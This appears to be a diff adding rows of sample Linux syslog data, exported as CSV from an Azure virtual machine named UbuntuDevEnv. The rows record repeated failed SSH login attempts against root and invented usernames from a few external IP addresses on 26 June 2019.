+3570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:15,UbuntuDevEnv,2019-06-26 12:53:15,auth,UbuntuDevEnv,info,Invalid user tamaki from 194.228.3.191 port 55396,117593,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tamaki,194.228.3.1,55396,,
+3571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:15,UbuntuDevEnv,2019-06-26 12:53:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,117593,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:15,UbuntuDevEnv,2019-06-26 12:53:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117593,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:17,UbuntuDevEnv,2019-06-26 12:53:17,auth,UbuntuDevEnv,info,Failed password for invalid user tamaki from 194.228.3.191 port 55396 ssh2,117593,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tamaki,194.228.3.1,55396,,
+3574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:17,UbuntuDevEnv,2019-06-26 12:53:17,auth,UbuntuDevEnv,info,Disconnected from invalid user tamaki 194.228.3.191 port 55396 [preauth],117593,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tamaki,194.228.3.1,55396,,
+3575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:17,UbuntuDevEnv,2019-06-26 12:53:17,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 55396:11: Bye Bye [preauth],117593,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,55396,,
+3576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:58,UbuntuDevEnv,2019-06-26 12:53:58,auth,UbuntuDevEnv,info,Invalid user bss from 27.106.45.6 port 51453,117740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bss,27.106.45.6,51453,,
+3577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:58,UbuntuDevEnv,2019-06-26 12:53:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:53:58,UbuntuDevEnv,2019-06-26 12:53:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,117740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:01,UbuntuDevEnv,2019-06-26 12:54:00,auth,UbuntuDevEnv,info,Failed password for invalid user bss from 27.106.45.6 port 51453 ssh2,117740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bss,27.106.45.6,51453,,
+3580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:01,UbuntuDevEnv,2019-06-26 12:54:00,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 51453:11: Bye Bye [preauth],117740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,51453,,
+3581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:01,UbuntuDevEnv,2019-06-26 12:54:00,auth,UbuntuDevEnv,info,Disconnected from invalid user bss 27.106.45.6 port 51453 [preauth],117740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bss,27.106.45.6,51453,,
+3582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:45,UbuntuDevEnv,2019-06-26 12:54:44,auth,UbuntuDevEnv,info,Invalid user zhouh from 194.228.3.191 port 35683,117912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,194.228.3.1,35683,,
+3583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:45,UbuntuDevEnv,2019-06-26 12:54:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:45,UbuntuDevEnv,2019-06-26 12:54:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,117912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:46,UbuntuDevEnv,2019-06-26 12:54:46,auth,UbuntuDevEnv,info,Failed password for invalid user zhouh from 194.228.3.191 port 35683 ssh2,117912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,194.228.3.1,35683,,
+3586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:46,UbuntuDevEnv,2019-06-26 12:54:46,auth,UbuntuDevEnv,info,Disconnected from invalid user zhouh 194.228.3.191 port 35683 [preauth],117912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,194.228.3.1,35683,,
+3587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:54:46,UbuntuDevEnv,2019-06-26 12:54:46,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 35683:11: Bye Bye [preauth],117912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,35683,,
+3588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:29,UbuntuDevEnv,2019-06-26 12:55:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:29,UbuntuDevEnv,2019-06-26 12:55:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,118057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:29,UbuntuDevEnv,2019-06-26 12:55:28,auth,UbuntuDevEnv,info,Invalid user avahi from 201.48.54.81 port 40375,118057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,201.48.54.8,40375,,
+3591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:30,UbuntuDevEnv,2019-06-26 12:55:30,auth,UbuntuDevEnv,info,Failed password for invalid user avahi from 201.48.54.81 port 40375 ssh2,118057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,201.48.54.8,40375,,
+3592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:30,UbuntuDevEnv,2019-06-26 12:55:30,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 40375:11: Bye Bye [preauth],118057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,40375,,
+3593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:55:30,UbuntuDevEnv,2019-06-26 12:55:30,auth,UbuntuDevEnv,info,Disconnected from invalid user avahi 201.48.54.81 port 40375 [preauth],118057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,201.48.54.8,40375,,
+3594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:00:56,UbuntuDevEnv,2019-06-26 13:00:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191  user=root,119314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,194.228.3.1,,0,
+3595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:00:57,UbuntuDevEnv,2019-06-26 13:00:57,auth,UbuntuDevEnv,info,Failed password for root from 194.228.3.191 port 41526 ssh2,119314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,41526,,
+3596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:00:58,UbuntuDevEnv,2019-06-26 13:00:57,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 41526:11: Bye Bye [preauth],119314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,41526,,
+3597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:00:58,UbuntuDevEnv,2019-06-26 13:00:57,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 194.228.3.191 port 41526 [preauth],119314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,194.228.3.1,41526,,
+3598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:01:17,UbuntuDevEnv,2019-06-26 13:01:17,auth,UbuntuDevEnv,info,Invalid user gautier from 201.48.54.81 port 37334,119394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gautier,201.48.54.8,37334,,
+3599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:01:17,UbuntuDevEnv,2019-06-26 13:01:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,119394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:01:17,UbuntuDevEnv,2019-06-26 13:01:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:01:19,UbuntuDevEnv,2019-06-26 13:01:18,auth,UbuntuDevEnv,info,Failed password for invalid user gautier from 201.48.54.81 port 37334 ssh2,119394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gautier,201.48.54.8,37334,,
+3602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:01:19,UbuntuDevEnv,2019-06-26 13:01:19,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 37334:11: Bye Bye [preauth],119394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,37334,,
+3603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:01:19,UbuntuDevEnv,2019-06-26 13:01:19,auth,UbuntuDevEnv,info,Disconnected from invalid user gautier 201.48.54.81 port 37334 [preauth],119394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gautier,201.48.54.8,37334,,
+3604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:02:25,UbuntuDevEnv,2019-06-26 13:02:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191  user=root,119631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,194.228.3.1,,0,
+3605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:02:26,UbuntuDevEnv,2019-06-26 13:02:26,auth,UbuntuDevEnv,info,Failed password for root from 194.228.3.191 port 50048 ssh2,119631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,50048,,
+3606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:02:26,UbuntuDevEnv,2019-06-26 13:02:26,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 50048:11: Bye Bye [preauth],119631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,50048,,
+3607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:02:26,UbuntuDevEnv,2019-06-26 13:02:26,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 194.228.3.191 port 50048 [preauth],119631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,194.228.3.1,50048,,
+3608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:01,UbuntuDevEnv,2019-06-26 13:03:01,auth,UbuntuDevEnv,info,Invalid user admin from 201.48.54.81 port 45734,119762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,201.48.54.8,45734,,
+3609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:01,UbuntuDevEnv,2019-06-26 13:03:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:01,UbuntuDevEnv,2019-06-26 13:03:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,119762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:04,UbuntuDevEnv,2019-06-26 13:03:03,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 201.48.54.81 port 45734 ssh2,119762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,201.48.54.8,45734,,
+3612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:04,UbuntuDevEnv,2019-06-26 13:03:03,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 201.48.54.81 port 45734 [preauth],119762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,201.48.54.8,45734,,
+3613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:04,UbuntuDevEnv,2019-06-26 13:03:03,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 45734:11: Bye Bye [preauth],119762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,45734,,
+3614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:33,UbuntuDevEnv,2019-06-26 13:03:32,auth,UbuntuDevEnv,info,Connection closed by 139.199.34.112 port 34412 [preauth],119860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,34412,,
+3615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:54,UbuntuDevEnv,2019-06-26 13:03:53,auth,UbuntuDevEnv,info,Invalid user mdpi from 194.228.3.191 port 58567,119946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdpi,194.228.3.1,58567,,
+3616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:54,UbuntuDevEnv,2019-06-26 13:03:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,119946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:54,UbuntuDevEnv,2019-06-26 13:03:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:56,UbuntuDevEnv,2019-06-26 13:03:55,auth,UbuntuDevEnv,info,Failed password for invalid user mdpi from 194.228.3.191 port 58567 ssh2,119946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdpi,194.228.3.1,58567,,
+3619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:56,UbuntuDevEnv,2019-06-26 13:03:55,auth,UbuntuDevEnv,info,Disconnected from invalid user mdpi 194.228.3.191 port 58567 [preauth],119946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdpi,194.228.3.1,58567,,
+3620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:03:56,UbuntuDevEnv,2019-06-26 13:03:55,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 58567:11: Bye Bye [preauth],119946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,58567,,
+3621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:35,UbuntuDevEnv,2019-06-26 13:04:35,auth,UbuntuDevEnv,info,Disconnected from 221.2.158.154 port 22070 [preauth],120096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,221.2.158.1,22070,,
+3622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:35,UbuntuDevEnv,2019-06-26 13:04:35,auth,UbuntuDevEnv,info,Received disconnect from 221.2.158.154 port 22070:11: Bye Bye [preauth],120096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,221.2.158.1,22070,,
+3623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:49,UbuntuDevEnv,2019-06-26 13:04:49,auth,UbuntuDevEnv,info,Invalid user spd from 201.48.54.81 port 54136,120144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spd,201.48.54.8,54136,,
+3624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:49,UbuntuDevEnv,2019-06-26 13:04:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:49,UbuntuDevEnv,2019-06-26 13:04:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,120144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:51,UbuntuDevEnv,2019-06-26 13:04:51,auth,UbuntuDevEnv,info,Failed password for invalid user spd from 201.48.54.81 port 54136 ssh2,120144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spd,201.48.54.8,54136,,
+3627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:52,UbuntuDevEnv,2019-06-26 13:04:51,auth,UbuntuDevEnv,info,Disconnected from invalid user spd 201.48.54.81 port 54136 [preauth],120144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spd,201.48.54.8,54136,,
+3628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:04:52,UbuntuDevEnv,2019-06-26 13:04:51,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 54136:11: Bye Bye [preauth],120144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,54136,,
+3629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:05:26,UbuntuDevEnv,2019-06-26 13:05:26,auth,UbuntuDevEnv,info,Invalid user boldwin from 194.228.3.191 port 38851,120277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,boldwin,194.228.3.1,38851,,
